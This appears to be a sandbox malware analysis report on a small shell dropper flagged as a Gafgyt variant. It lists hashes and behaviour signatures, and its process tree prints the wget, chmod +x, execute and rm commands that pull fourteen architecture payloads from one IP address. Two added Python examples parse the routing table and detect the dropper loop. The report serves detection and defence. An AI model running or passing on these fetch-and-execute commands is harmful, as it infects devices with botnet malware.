Analysis
- max time kernel: 23s
- max time network: 26s
- platform: debian-9_mipsel
- resource: debian9-mipsel-20240611-en
- resource tags: arch:mipsel, image:debian9-mipsel-20240611-en, kernel:4.9.0-13-4kc-malta, locale:en-us, os:debian-9-mipsel, system
- submitted: 19-10-2024 11:41
Static task: static1
Behavioral tasks (sample / resource):
- behavioral1: bins.sh / debian12-armhf-20240418-en
- behavioral2: bins.sh / debian12-mipsel-20240729-en
- behavioral3: bins.sh / debian9-armhf-20240611-en
- behavioral4: bins.sh / debian9-mipsbe-20240418-en
- behavioral5: bins.sh / debian9-mipsel-20240611-en (the run shown in this report)
- behavioral6: bins.sh / ubuntu1804-amd64-20240611-en
- behavioral7: bins.sh / ubuntu2004-amd64-20240611-en
- behavioral8: bins.sh / ubuntu2204-amd64-20240611-en
- behavioral9: bins.sh / ubuntu2404-amd64-20240523-en
General
- Target: bins.sh
- Size: 2KB
- MD5: a754f4cf9d6ba2d574cd90bf04d1bc35
- SHA1: b0191e89c26057b6132f3314fa685e1879c7dc62
- SHA256: bf9fa0c44e56d564d8675f89533c1930b9481597d1f0d09153757d595b8ddaa0
- SHA512: 600b970d65a1b8d80e0c7e9808cff50fbb610762a97d619293b859383c85ff671a28793f49d8207c984ffe113c63dabfa66d3df4d922b32c79ce707b3393162f
Malware Config
Signatures
-
Detected Gafgyt variant (1 IoC)
Processes (resource, yara_rule):
/tmp/Demon.mips, family_gafgyt
-
File and Directory Permissions Modification (1 TTP, 14 IoCs)
Adversaries may modify file or directory permissions to evade defenses.
Processes (pid process):
778 chmod, 792 chmod, 807 chmod, 751 chmod, 761 chmod, 766 chmod, 730 chmod, 746 chmod, 756 chmod, 824 chmod, 740 chmod, 836 chmod, 841 chmod, 846 chmod
-
Executes dropped EXE (1 IoC)
Processes (ioc, pid, process):
/tmp/Demon.mips, 731, Demon.mips
-
Reads system routing table (1 TTP, 1 IoC)
Gets active network interfaces from /proc virtual filesystem.
Processes (description, ioc, process):
File opened for reading, /proc/net/route, Demon.mpsl
-
Changes its process name (1 IoC)
Processes (description, pid, process):
Changes the process name, possibly in an attempt to hide itself, 741, Demon.mpsl
-
Reads system network configuration (1 TTP, 1 IoC)
Uses contents of /proc filesystem to enumerate network settings.
Processes (description, ioc, process):
File opened for reading, /proc/net/route, Demon.mpsl
-
System Network Configuration Discovery (1 TTP, 3 IoCs)
Adversaries may gather information about the network configuration of a system.
Processes (pid process):
710 wget, 731 Demon.mips, 735 rm
-
Writes file to tmp directory (13 IoCs)
Malware often drops required files in the /tmp directory.
Processes (description, ioc, process):
File opened for modification, /tmp/Demon.x86, wget
File opened for modification, /tmp/Demon.arm4, wget
File opened for modification, /tmp/Demon.arm5, wget
File opened for modification, /tmp/Demon.m68k, wget
File opened for modification, /tmp/Demon.mips, wget
File opened for modification, /tmp/Demon.mpsl, wget
File opened for modification, /tmp/Demon.sh4, wget
File opened for modification, /tmp/Demon.arm6, wget
File opened for modification, /tmp/Demon.i686, wget
File opened for modification, /tmp/Demon.ppc, wget
File opened for modification, /tmp/Demon.i586, wget
File opened for modification, /tmp/Demon.sparc, wget
File opened for modification, /tmp/Demon.arm7, wget
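The two /proc signatures above ("Reads system routing table" and "Reads system network configuration") both come from Demon.mpsl opening /proc/net/route. What a process gets out of that file is the kernel routing table, which is enough to find the default gateway and the interfaces that are up. The following parser is an added example, not code from the sandbox or from the sample, run over a constructed /proc/net/route excerpt. One caveat worth knowing when reading this table: addresses are printed as 32-bit values in host byte order, so the same line looks different on the mipsel run shown here and on the mipsbe task also listed for this sample; the `little_endian` flag covers both.

```python
import socket
import struct

# Constructed excerpt of /proc/net/route as a little-endian host (e.g. the mipsel
# sandbox) renders it. Address columns are host-order u32 values printed in hex.
SAMPLE_ROUTE = (
    "Iface\tDestination\tGateway \tFlags\tRefCnt\tUse\tMetric\tMask\t\tMTU\tWindow\tIRTT\n"
    "eth0\t00000000\t0100A8C0\t0003\t0\t0\t0\t00000000\t0\t0\t0\n"
    "eth0\t0000A8C0\t00000000\t0001\t0\t0\t0\t00FFFFFF\t0\t0\t0\n"
    "lo\t0000007F\t00000000\t0001\t0\t0\t0\t000000FF\t0\t0\t0\n"
)

RTF_UP = 0x0001       # route is usable
RTF_GATEWAY = 0x0002  # destination is reached through a gateway


def parse_routes(text, little_endian=True):
    """Parse the /proc/net/route table into a list of dicts.

    Each address column is a host-order u32 in hex, so the byte order of the
    machine that produced the file decides how to unpack it: '<L' on mipsel/x86,
    '>L' on mipsbe/ppc/sparc.
    """
    fmt = "<L" if little_endian else ">L"

    def ip(hex_word):
        return socket.inet_ntoa(struct.pack(fmt, int(hex_word, 16)))

    routes = []
    for line in text.splitlines()[1:]:  # skip the header row
        fields = line.split()
        if len(fields) < 8:
            continue
        iface, dest, gw, flags, _refcnt, _use, metric, mask = fields[:8]
        routes.append({
            "iface": iface,
            "dest": ip(dest),
            "gateway": ip(gw),
            "mask": ip(mask),
            "flags": int(flags, 16),
            "metric": int(metric),
        })
    return routes


def default_gateway(routes):
    """Return (iface, gateway) for the default route, or None if there is none."""
    for r in routes:
        if r["dest"] == "0.0.0.0" and r["flags"] & RTF_UP and r["flags"] & RTF_GATEWAY:
            return r["iface"], r["gateway"]
    return None


def active_interfaces(routes):
    """Interfaces that carry at least one route flagged RTF_UP."""
    return sorted({r["iface"] for r in routes if r["flags"] & RTF_UP})


if __name__ == "__main__":
    table = parse_routes(SAMPLE_ROUTE)
    print("default gateway:", default_gateway(table))
    print("up interfaces:", active_interfaces(table))
```

For detection purposes the read itself is not suspicious (ip, route and netstat all do it); the signal is a freshly dropped, unsigned binary in /tmp doing it right after it starts, which is why the sandbox reports it alongside the drop-and-execute events rather than on its own.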
Processes
-
Process tree (pid, executable, command line, matched signatures in brackets). Everything after the first line runs as a direct child of /tmp/bins.sh (PID 707); the script repeats the same fetch, chmod +x, execute, rm sequence once per architecture.
707  /tmp/bins.sh  /tmp/bins.sh
710  /usr/bin/wget  wget http://38.123.149.216/Demon.mips  [System Network Configuration Discovery; Writes file to tmp directory]
730  /bin/chmod  chmod +x Demon.mips  [File and Directory Permissions Modification]
731  /tmp/Demon.mips  ./Demon.mips  [Executes dropped EXE; System Network Configuration Discovery]
735  /bin/rm  rm -rf Demon.mips  [System Network Configuration Discovery]
736  /usr/bin/wget  wget http://38.123.149.216/Demon.mpsl  [Writes file to tmp directory]
740  /bin/chmod  chmod +x Demon.mpsl  [File and Directory Permissions Modification]
741  /tmp/Demon.mpsl  ./Demon.mpsl  [Reads system routing table; Changes its process name; Reads system network configuration]
744  /bin/rm  rm -rf Demon.mpsl
745  /usr/bin/wget  wget http://38.123.149.216/Demon.sh4  [Writes file to tmp directory]
746  /bin/chmod  chmod +x Demon.sh4  [File and Directory Permissions Modification]
747  /tmp/Demon.sh4  ./Demon.sh4
749  /bin/rm  rm -rf Demon.sh4
750  /usr/bin/wget  wget http://38.123.149.216/Demon.x86  [Writes file to tmp directory]
751  /bin/chmod  chmod +x Demon.x86  [File and Directory Permissions Modification]
752  /tmp/Demon.x86  ./Demon.x86
754  /bin/rm  rm -rf Demon.x86
755  /usr/bin/wget  wget http://38.123.149.216/Demon.arm6  [Writes file to tmp directory]
756  /bin/chmod  chmod +x Demon.arm6  [File and Directory Permissions Modification]
757  /tmp/Demon.arm6  ./Demon.arm6
759  /bin/rm  rm -rf Demon.arm6
760  /usr/bin/wget  wget http://38.123.149.216/Demon.i686  [Writes file to tmp directory]
761  /bin/chmod  chmod +x Demon.i686  [File and Directory Permissions Modification]
762  /tmp/Demon.i686  ./Demon.i686
764  /bin/rm  rm -rf Demon.i686
765  /usr/bin/wget  wget http://38.123.149.216/Demon.ppc  [Writes file to tmp directory]
766  /bin/chmod  chmod +x Demon.ppc  [File and Directory Permissions Modification]
767  /tmp/Demon.ppc  ./Demon.ppc
769  /bin/rm  rm -rf Demon.ppc
770  /usr/bin/wget  wget http://38.123.149.216/Demon.i586  [Writes file to tmp directory]
778  /bin/chmod  chmod +x Demon.i586  [File and Directory Permissions Modification]
780  /tmp/Demon.i586  ./Demon.i586
783  /bin/rm  rm -rf Demon.i586
784  /usr/bin/wget  wget http://38.123.149.216/Demon.m68k  [Writes file to tmp directory]
792  /bin/chmod  chmod +x Demon.m68k  [File and Directory Permissions Modification]
794  /tmp/Demon.m68k  ./Demon.m68k
797  /bin/rm  rm -rf Demon.m68k
798  /usr/bin/wget  wget http://38.123.149.216/Demon.sparc  [Writes file to tmp directory]
807  /bin/chmod  chmod +x Demon.sparc  [File and Directory Permissions Modification]
808  /tmp/Demon.sparc  ./Demon.sparc
812  /bin/rm  rm -rf Demon.sparc
813  /usr/bin/wget  wget http://38.123.149.216/Demon.arm4  [Writes file to tmp directory]
824  /bin/chmod  chmod +x Demon.arm4  [File and Directory Permissions Modification]
825  /tmp/Demon.arm4  ./Demon.arm4
829  /bin/rm  rm -rf Demon.arm4
830  /usr/bin/wget  wget http://38.123.149.216/Demon.arm5  [Writes file to tmp directory]
836  /bin/chmod  chmod +x Demon.arm5  [File and Directory Permissions Modification]
837  /tmp/Demon.arm5  ./Demon.arm5
839  /bin/rm  rm -rf Demon.arm5
840  /usr/bin/wget  wget http://38.123.149.216/Demon.arm7  [Writes file to tmp directory]
841  /bin/chmod  chmod +x Demon.arm7  [File and Directory Permissions Modification]
842  /tmp/Demon.arm7  ./Demon.arm7
844  /bin/rm  rm -rf Demon.arm7
845  /usr/bin/wget  wget http://38.123.149.216/Demon.ppc440fp
846  /bin/chmod  chmod +x Demon.ppc440fp  [File and Directory Permissions Modification]
847  /tmp/Demon.ppc440fp  ./Demon.ppc440fp
848  /bin/rm  rm -rf Demon.ppc440fp
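The process tree is the whole story of this sample: a 2KB shell script that, for each of fourteen architecture builds, fetches a payload from one host into /tmp, marks it executable, launches it and deletes the file. That loop is a better detection target than any single binary hash, because the hashes change per campaign while the loop does not. The detector below is an added example, not part of the report, that replays a constructed excerpt of the tree above as (pid, ppid, executable, command line) records and flags a parent that completes the fetch, chmod +x, execute, rm chain for several artifacts from the same host. The benign wget to mirror.example is invented noise to show that a lone download does not trigger it.

```python
import re
from collections import defaultdict
from urllib.parse import urlparse

# Constructed excerpt of the process tree above as (pid, ppid, executable, command line).
# Three of the fourteen architecture iterations are reproduced, plus one benign wget
# (invented noise) that is never chmod'ed or executed.
CONSTRUCTED_TREE = [
    (707, 1,   "/tmp/bins.sh",        "/tmp/bins.sh"),
    (710, 707, "/usr/bin/wget",       "wget http://38.123.149.216/Demon.mips"),
    (730, 707, "/bin/chmod",          "chmod +x Demon.mips"),
    (731, 707, "/tmp/Demon.mips",     "./Demon.mips"),
    (735, 707, "/bin/rm",             "rm -rf Demon.mips"),
    (736, 707, "/usr/bin/wget",       "wget http://38.123.149.216/Demon.mpsl"),
    (740, 707, "/bin/chmod",          "chmod +x Demon.mpsl"),
    (741, 707, "/tmp/Demon.mpsl",     "./Demon.mpsl"),
    (744, 707, "/bin/rm",             "rm -rf Demon.mpsl"),
    (845, 707, "/usr/bin/wget",       "wget http://38.123.149.216/Demon.ppc440fp"),
    (846, 707, "/bin/chmod",          "chmod +x Demon.ppc440fp"),
    (847, 707, "/tmp/Demon.ppc440fp", "./Demon.ppc440fp"),
    (848, 707, "/bin/rm",             "rm -rf Demon.ppc440fp"),
    (900, 1,   "/usr/bin/wget",       "wget -q http://mirror.example/pool/tool.deb"),
]

STAGES = frozenset({"fetch", "chmod", "exec", "rm"})

FETCH_RE = re.compile(r"^wget\s+(?:-\S+\s+)*(\S+://\S+)")
CHMOD_RE = re.compile(r"^chmod\s+\+x\s+(\S+)")
EXEC_RE = re.compile(r"^\./(\S+)")
RM_RE = re.compile(r"^rm\s+(?:-\S+\s+)*(\S+)")


def classify(cmd):
    """Map one command line to (stage, artifact name, url-or-None), or None if unrelated."""
    m = FETCH_RE.match(cmd)
    if m:
        url = m.group(1)
        return "fetch", url.rsplit("/", 1)[-1], url
    for stage, rx in (("chmod", CHMOD_RE), ("exec", EXEC_RE), ("rm", RM_RE)):
        m = rx.match(cmd)
        if m:
            return stage, m.group(1), None
    return None


def detect_dropper(tree, min_artifacts=3):
    """Flag parents that run fetch -> chmod +x -> execute -> rm for several artifacts.

    Events are keyed by parent PID and artifact basename, so the loop is recognised
    however many architectures it cycles through and in whatever order.
    """
    stages = defaultdict(lambda: defaultdict(set))  # ppid -> name -> stages seen
    urls = defaultdict(set)                          # ppid -> download URLs
    for _pid, ppid, _exe, cmd in tree:
        hit = classify(cmd)
        if hit is None:
            continue
        stage, name, url = hit
        stages[ppid][name].add(stage)
        if url:
            urls[ppid].add(url)

    findings = []
    for ppid, by_name in stages.items():
        complete = sorted(n for n, seen in by_name.items() if seen == STAGES)
        if len(complete) < min_artifacts:
            continue
        findings.append({
            "parent_pid": ppid,
            "artifacts": complete,
            "download_hosts": sorted({urlparse(u).netloc for u in urls[ppid]}),
            "urls": sorted(urls[ppid]),
        })
    return findings


if __name__ == "__main__":
    for f in detect_dropper(CONSTRUCTED_TREE):
        print(f"multi-arch dropper under PID {f['parent_pid']}: "
              f"{len(f['artifacts'])} payloads from {', '.join(f['download_hosts'])}")
        for u in f["urls"]:
            print("  IOC url:", u)
```

The same records can be fed from auditd execve events or EDR process telemetry instead of a sandbox tree. The artifact threshold exists because a legitimate installer may well fetch, chmod and run one file; it is the spray across architectures, plus the rm immediately after launch, that marks a bot dropper. That rm also leaves a durable host artifact: the surviving payload keeps running from an unlinked file, so its /proc/<pid>/exe link reads "(deleted)", which is a cheap thing to sweep for on IoT fleets even after the script and downloads are gone.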
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 211KB
- MD5: 455a2acf75de8da6ab7c4d9564cc69f9
- SHA1: 9e6016c6581289e685bcd6392bbf0bcf6b1182ff
- SHA256: b08dea7aae12f248b7730af3c8f924dd67d3251d78df15a9dfb75e5d961df152
- SHA512: a76b00d7f684d762ea9d5fa60d579d70b8bdfe75faedb59baae6ffb676d25d57826cde4a639c0b32dfcc3288a965591e148a489e6259910e3e0dbee90ccadeab